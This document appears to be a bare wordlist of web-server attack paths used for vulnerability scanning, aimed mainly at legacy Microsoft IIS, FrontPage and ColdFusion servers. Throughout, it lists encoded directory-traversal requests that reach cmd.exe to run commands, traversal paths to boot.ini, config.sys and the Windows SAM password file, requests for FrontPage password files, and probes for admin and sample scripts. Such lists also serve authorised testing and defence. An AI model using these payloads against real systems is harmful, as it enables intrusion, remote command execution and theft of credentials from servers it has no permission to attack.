/*.ida
/*.idc
/*.idq
/........../autoexec.bat
/Global.asa
/....../
/....../ all
/../../../../ all
/../../../../../../../boot.ini
/../../../../../winnt/repair/sam._
/../../../../config.sys
/?PageServices
/_AuthChangeUrl
/_AuthChangeUrl?
/_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
/_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
/_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir
/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\
/_mem_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c
/_private
/_private/form_results.txt
/_private/orders.txt
/_private/register.txt
/_private/registrations.txt
/_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
/_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
/_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir
/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/fpcount.exe
/_vti_bin/fpexe
/_vti_bin/shtml.dll
/_vti_bin/shtml.dll/_vti_rpc
/_vti_bin/shtml.exe
/_vti_inf.html
/_vti_pvt
/_vti_pvt/
/_vti_pvt/administrator.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/author.log
/_vti_pvt/authors.pwd
/_vti_pvt/doctodep.btr
/_vti_pvt/service.grp
/_vti_pvt/service.pwd
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/users.pwd
/a.asp/..\../..\../winnt/repair/sam
/abczxv.htw
/Admin_files/order.log
/admisapi/fpadmin.htm
/adsamples/config/site.csc
/AdvWorks/equipment/catalog_type.asp
/app.cfm
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/autoexec.bat
/bdir.htr
/bin/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/bin/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/bin/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/bin/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/bin/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/bin/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/bin/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/bin/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/bin/scripts/../../../../winnt/system32/cmd.exe /c+dir?/c+dir%20c:\
/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir
/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir%20c:\
/bin/scripts/..\..\..\../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
/bin/scripts/.._../winnt/system32/cmd.exe?/c+dir
/bin/scripts/openvendor/gnete/RetrievePNBody.asp
/blabla.idq
/carbo.dll
/catalog.nsf
/catalog.nsf/
/cfappman/index.cfm
/cfcache.map
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/httpclient/mainframeset.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/ExprCalc.cfm
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/root.cfm
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/snippets/viewexample.cfm
/cfide/administrator/index.cfm
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/security/realm_.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cypress.mdb
/cfusion/database/smpolicy.mdb
/cgi
/cgibin
/cgi-bin
/Cgi-Bin/
/cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
/cgi-bin/../../../../winnt/system32/cmd.exe
/cgi-bin/..\..\..\../winnt/system32/cmd.exe
/cgi-bin/.._../winnt/system32/cmd.exe?/c+dir
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/fpexplorer.exe
/Cgi-Bin/get32.exe
/cgi-bin/get32.exe
/cgi-bin/get32.exe\dir
/Cgi-Bin/hello.bat
/Cgi-Bin/htimage.exe
/cgi-bin/htimage.exe
/cgi-bin/iisadmpwd/achg.htr
/cgi-bin/iisadmpwd/aexp.htr
/cgi-bin/iisadmpwd/aexp2.htr
/cgi-bin/iisadmpwd/anot.htr
/cgi-bin/imagemap.exe
/cgi-bin/input.bat
/cgi-bin/input2.bat
/cgi-bin/mailform.exe
/Cgi-Bin/perl.exe
/cgi-bin/perl.exe
/cgi-bin/ppdscgi.exe
/Cgi-Bin/rguest.exe
/cgi-bin/rguest.exe
/cgi-bin/sam._
/cgi-bin/scripts/perl.exe
/cgi-bin/search97.vts
/cgi-bin/snorkerz.bat
/cgi-bin/snorkerz.cmd
/cgi-bin/test.bat
/cgi-bin/tst.bat
/cgi-bin/tst.bat\dir
/cgi-bin/visadmin.exe
/cgi-bin/visadmin.exe?user=guest
/cgi-bin/visitor.exe
/cgi-Bin/wguest.exe
/cgi-bin/wguest.exe
/cgi-Bin/windmail.exe
/cgi-bin/windmail.exe
/cgi-dos/args.bat
/cgi-dos/args.cmd
/cgi-shl/win-c-sample.exe
/cgi-win
/cgi-win/perl.exe
/Cgi-Win/uploader.exe
/cgi-win/uploader.exe
/cgi-win/wguest.exe
/cmd.exe?/c+dir%20c:\
/com1
/com2
/com3
/com4
/con/con
/config/checks.txt
/config/import.txt
/config/mountain.cfg
/config/orders.txt
/default.asp%2e
/default.asp%2e%41sp
/default.asp%81
/default.asp.
/default.asp::$DATA
/default.asp\\
/default.asp+.htr
/doc
/getfile.cfm
/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\\WINNT\\repair\\sam._
/global.asa+.htr
/head.css
/hosts.dat
/iisadmin/
/iisadmpwd/achg.htr
/IISADMPWD/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/iishelp/iis/misc/iirturnh.htw
/iissamples/exair/howitworks/code.asp
/iissamples/exair/howitworks/codebrws.asp
/iissamples/exair/howitworks/showcode.asp
/iissamples/exair/search/advsearch.asp
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iissamples/exair/search/query.idq
/IISSAMPLES/ExAir/Search/search.asp
/iissamples/exair/search/search.idq
/iissamples/iissamples/query.asp
/iissamples/issamples/fastq.idq
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/issamples/query.asp
/iissamples/issamples/query.idq
/iissamples/sdk/asp/docs/codebrws.asp
/include/css.css
/include/head.html
/index.asp%2e
/index.asp%2e%41sp
/index.asp%81
/index.asp.
/index.asp::$DATA
/index.asp\\
/index.asp+.htr
/main.asp%2e
/main.asp%2e%41sp
/main.asp%81
/main.asp.
/main.asp::$DATA
/main.asp\\
/main.asp+.htr
/msadc
/msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
/msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/../../../../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..\../..\../..\../winnt/system32/cmd.exe?/c+dir
/msadc/..\../..\../..\../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/.._../winnt/system32/cmd.exe?/c+dir
/msadc/msadcs.dll
/msadc/samples/adctest.asp
/msadc/Samples/SELECTOR/codebrws.cfm
/msadc/Samples/SELECTOR/showcode.asp
/msadc/samples/selector/showcode.asp
/msadc/samples/selector/showcode.asp_2
/msads/Samples/SELECTOR/showcode.asp
/msads/samples/selector/showcode.asp
/passwd
/passwd.txt
/password
/password.dat
/password.log
/password.txt
/rightfax/fuwww.dll/
/robots.txt
/samples/search/queryhit.htm
/script/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/script/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/script/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/script/.._../winnt/system32/cmd.exe?/c+dir
/scripts
/scripts/
/scripts/*
/scripts/*.pl
/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/../../../../../winnt/system32/cmd.exe?/c+dir
/scripts/../../../../../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/../../cmd.exe
/scripts/../../winnt/system32/cmd.exe?/c+dir
/scripts/..\../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..\..\..\..\../winnt/system32/cmd.exe?/c+dir
/scripts/..\..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/.._../winnt/system32/cmd.exe?/c+dir
/scripts/c32web.exe/ChangeAdminPassword
/scripts/cart32.exe/cart32clientlist
/scripts/CGImail.exe
/scripts/cmd.exe
/scripts/cmd.exe?/c+dir%20c:\
/scripts/cmd32.exe
/scripts/cmd32.exe?/c+dir
/scripts/convert.bas
/scripts/counter.exe
/scripts/cpshost.dll
/scripts/dbman/db.cgi?db=invalid-db
/scripts/emurl/RECMAN.dll
/scripts/environ.pl
/scripts/fpcount.exe
/scripts/htimage.exe
/scripts/iisadmin/bdir.htr
/scripts/iisadmin/ism.dll
/scripts/iisadmin/ism.dll?http/dir
/scripts/iisadmin/tools/ctss.idc
/scripts/iisadmin/tools/getdrvrs.exe
/scripts/iisadmin/tools/mkilog.exe
/scripts/issadmin/bdir.htr
/scripts/lsass.exe
/scripts/no-such-file.pl
/scripts/perl
/scripts/pfieffer.bat
/scripts/pfieffer.cmd
/scripts/postinfo.asp
/scripts/proxy/w3proxy.dll
/scripts/repost.asp
/scripts/rguest.exe
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/scripts/samples/search/author.idq
/scripts/samples/search/filesize.idq
/scripts/samples/search/filetime.idq
/scripts/samples/search/qfullhit.htw
/scripts/samples/search/qsumrhit.htw
/scripts/samples/search/query.idq
/scripts/samples/search/queryhit.idq
/scripts/samples/search/simple.idq
/scripts/samples/search/webhits.exe
/scripts/slxweb.dll
/scripts/srchadm/webhits.exe
/scripts/tools/dsnform.exe
/scripts/tools/getdrvrs.exe
/scripts/tools/getdrvs.exe
/scripts/tools/mkilog.exe
/scripts/tools/newdsn.exe
/scripts/tools/uploadn.asp
/scripts/tools/uploadx.asp
/scripts/upload.asp
/scripts/uploadn.asp
/scripts/uploadx.asp
/scripts/visadmin.exe
/scripts/wa.exe
/scripts/webbbs.exe
/scripts/wguest.exe
/scripts/wsisa.dll
/search
/search97.vts
/secure/.htaccess
/secure/.wwwacl
/server-info
/server-status
/session/adminlogin
/showfile.asp
/smdata.dat
/ssi/envout.bat
/today.nsf
/tree.dat
/user.dat
/user.log
/WebShop/logs/cc.txt
/WebShop/logs/ck.log
/WebShop/templates/cc.txt
/ws_ftp.ini
/wwwboard.pl
/wwwboard/passwd.txt
/.html/............*/config.sys
/.html/............./config.sys
/.html/............/autoexec.bat
/....../autoexec.bat
/....../config.sys
/cgi-bin/GW5
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/GWWEB.EXE
/Scripts  
/cgi-bin/ 
/srchadm 
/iisadmin 
/iissamples 
/iissamples/Default 
/iissamples/ExAir 
/iissamples/ISSamples 
/iisamples/Sdk 
/Scripts/samples 
/Scripts/tools 
/_private 
/_vti_bin 
/_vti_log 
/_vti_pvt 
/_vti_txt 
/cgi-bin/_vti_cnf 
/_vti_bin/_vti_adm 
/_vti_bin/_vti_aut 
/scripts/iisadmin 
/scripts/IISADMPWD 
/scripts/iisadmin/samples 
/scripts/iisadmin/tools 
/admisapi/ 
/scripts/Fpadmcgi.exe 
/msadc/samples/adctest.asp 
/_vti_bin/_vti_aut/author.dll 
/_vti_adm/admin.dll 
/scripts/proxy/w3proxy.dll 
/scripts/cpshost.dll 
/scripts/convert.bas 
/AdvWorks/equipment/catalog_type.asp 
/scripts/perl 
/scripts/iisadmin/default.htm 
/cgi-bin/visitor.exe 
/scripts/../../cmd.exe 
/cgi-win/wincgi.bat 
/..../Windows/Admin.pwl 
/_vti_bin/shtml.dll/_vti_rpc 
/_vti_bin/_vti_aut/dvwssr.dll 
/cfdocs/
/cfide/
/cfappman/
/cfdocs/examples/
/cfdocs/exampleapp/
/cfide/Administrator/
/cfdocs/snippets/
/CFIDE/Administrator/startstop.html
/page.cfm
/cfdocs/zero.cfm
/cfdocs/expressions.cfm
/cfdocs/TOXIC.CFM
/cfdocs/MOLE.CFM
/cfdocs/cfcache.map
/cfdocs/exampleapp/publish/admin/application.cfm
/cfdocs/exampleapp/email/application.cfm
/cgi-bin/dbmlparser.exe
/cgi-bin/test.cgi
/private
/cgi-bin/guestbook.cgi
/sample.asp
/../../../../../../../../boot.ini
/../../../../../../boot.ini
/../../../../../boot.ini
/../../../../boot.ini
/../../../boot.ini
/../../boot.ini
/\../boot.ini
/\../config.sys
/nofile.pl
/...................../config.sys
/..................../boot.ini
/.................../boot.ini
/................../boot.ini
/................./boot.ini
/................/boot.ini
/.............../boot.ini
/............../boot.ini
/............./boot.ini
/............/boot.ini
/.........../boot.ini
/........../boot.ini
/........./boot.ini
/......../boot.ini
/......./boot.ini
/....../boot.ini
/...../boot.ini
/..../boot.ini
/.../boot.ini
/../boot.ini
/..\..\..\winnt\repair\sam._
/../../winnt/win.ini
/..\..\autoexec.bat
/..\..\..\autoexec.bat
/..\..\..\..\autoexec.bat
/..\..\..\..\..\autoexec.bat
/..\..\..\..\..\..\autoexec.bat
/\../readme.txt
/_mem_bin/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/_vti_aut/fp30reg.dll
/index.asp.bak
/iissamples/ISSamples/SQLQHit.asp
/Scripts/..%u0025u005c..u0025u005cWINNT/system32/cmd.exe?/c+dir+c:
/cgi-bin/perlis.dll
/cgi-bin/buy.storefront/3baecb4a00025ad227a4c30e95010642/winnt/cmd.exe?/c+dir+c:\